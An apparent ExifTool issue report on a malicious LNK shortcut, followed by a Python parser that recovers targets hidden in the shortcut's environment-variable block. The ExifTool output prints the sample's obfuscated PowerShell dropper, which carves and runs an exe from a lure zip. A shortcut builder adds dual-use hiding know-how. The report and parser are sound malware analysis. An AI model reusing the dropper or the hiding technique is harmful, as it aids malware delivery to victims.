Closed
Description
Somebody did a writeup about an attack using LNK files and I checked if exiftool would parse it properly. While it's picking out the Command Line Arguments field fine, it's not displaying the actual target EXE (which should be C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe).
ExifTool Version Number : 13.40
File Name : 911cccd238fbfdb4babafc8d2582e80dcfa76469fa1ee27bbc5f4324d5fca539
Directory : .
File Size : 2.6 kB
File Modification Date/Time : 1980:01:10 00:00:00-05:00
File Access Date/Time : 2025:11:03 13:33:33-05:00
File Inode Change Date/Time : 2025:11:03 13:41:13-05:00
File Permissions : -rw-r--r--
File Type : LNK
File Type Extension : lnk
MIME Type : application/octet-stream
Flags : Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath, KeepLocalIDList
File Attributes : (none)
Target File Size : 1174780
Icon Index : (none)
Run Window : Show Minimized No Activate
Hot Key : (none)
Description : pdf
Command Line Arguments : -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"
Icon File Name : .\WindowssSystem326Shell32.pdf
I reported a similar issue in the past with exiftool and I have your email address for receiving such samples if you like. Just let me know...
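The Flags line above includes ExpString and PreferEnvPath. In the MS-SHLLINK format those bits (HasExpString, PreferEnvironmentPath) mean the shortcut carries its target path in an EnvironmentVariableDataBlock inside the ExtraData section rather than in the LinkInfo structure, which is one place a metadata tool can miss it. The following is an added example, not part of the issue or of ExifTool, showing how an analyst can pull that block out directly: it parses the fixed header, skips the optional LinkTargetIDList and LinkInfo, walks the StringData strings, and then scans ExtraData for the environment-variable block. The `build_sample_lnk` helper and the target/argument values it uses are constructed for the demonstration; the offsets and signature values come from the public specification.

```python
import struct

# Constants from the MS-SHLLINK specification (Shell Link binary format).
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

HAS_LINK_TARGET_ID_LIST = 0x00000001
HAS_LINK_INFO           = 0x00000002
HAS_NAME                = 0x00000004
HAS_RELATIVE_PATH       = 0x00000008
HAS_WORKING_DIR         = 0x00000010
HAS_ARGUMENTS           = 0x00000020
HAS_ICON_LOCATION       = 0x00000040
IS_UNICODE              = 0x00000080
HAS_EXP_STRING          = 0x00000200
PREFER_ENVIRONMENT_PATH = 0x00002000

ENV_VAR_DATA_BLOCK_SIG  = 0xA0000001  # EnvironmentVariableDataBlock
ENV_VAR_DATA_BLOCK_SIZE = 0x314       # 8-byte block header + 260 ANSI + 520 Unicode bytes


def parse_lnk(data: bytes) -> dict:
    """Return header flags, StringData fields and the ExpString target of a .LNK blob."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    result = {"flags": flags, "target_env": None}
    pos = HEADER_SIZE

    # Optional LinkTargetIDList: uint16 size followed by that many bytes.
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    # Optional LinkInfo: uint32 total size (includes the size field itself).
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]

    # StringData: each present string is a uint16 character count plus the characters.
    unicode = bool(flags & IS_UNICODE)
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if unicode else 1
            raw = data[pos:pos + count * width]
            pos += count * width
            result[name] = raw.decode("utf-16-le" if unicode else "cp1252", "replace")

    # ExtraData: a sequence of (BlockSize, BlockSignature, body) ended by a size < 4.
    while pos + 4 <= len(data):
        size = struct.unpack_from("<I", data, pos)[0]
        if size < 4 or pos + size > len(data):
            break  # TerminalBlock, or a truncated/corrupt block
        sig = struct.unpack_from("<I", data, pos + 4)[0]
        body = data[pos + 8:pos + size]
        if sig == ENV_VAR_DATA_BLOCK_SIG and size == ENV_VAR_DATA_BLOCK_SIZE:
            ansi = body[:260].split(b"\x00", 1)[0].decode("cp1252", "replace")
            uni = body[260:780].decode("utf-16-le", "replace").split("\x00", 1)[0]
            result["target_env"] = uni or ansi  # the Unicode copy is authoritative when present
        pos += size
    return result


def build_sample_lnk(target: str, args: str, name: str = "pdf") -> bytes:
    """Construct a minimal shortcut that stores its target only in an EnvironmentVariableDataBlock.

    This is sample data built for the demonstration, not the file from the issue.
    """
    flags = HAS_NAME | HAS_ARGUMENTS | IS_UNICODE | HAS_EXP_STRING | PREFER_ENVIRONMENT_PATH
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += struct.pack("<I", 0)                  # FileAttributes
    header += b"\x00" * 24                          # Creation/Access/Write FILETIMEs
    header += struct.pack("<IIIH", 0, 0, 7, 0)      # FileSize, IconIndex, ShowCommand=SW_SHOWMINNOACTIVE, HotKey
    header += b"\x00" * 10                          # Reserved1/2/3
    assert len(header) == HEADER_SIZE

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    env_block = struct.pack("<II", ENV_VAR_DATA_BLOCK_SIZE, ENV_VAR_DATA_BLOCK_SIG)
    env_block += target.encode("cp1252").ljust(260, b"\x00")
    env_block += target.encode("utf-16-le").ljust(520, b"\x00")
    terminal = struct.pack("<I", 0)
    return header + string_data(name) + string_data(args) + env_block + terminal


if __name__ == "__main__":
    # Constructed sample: the target path is the one the issue says should be shown.
    blob = build_sample_lnk(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "-w 1 -c echo sample")
    info = parse_lnk(blob)
    print("ExpString target:", info["target_env"])
    print("Arguments       :", info["arguments"])
```

Running the script against a real shortcut is a matter of passing `open(path, "rb").read()` to `parse_lnk`; a non-empty `target_env` alongside an absent LinkInfo is the case the issue describes, where the argument string is visible but the executable being launched is not.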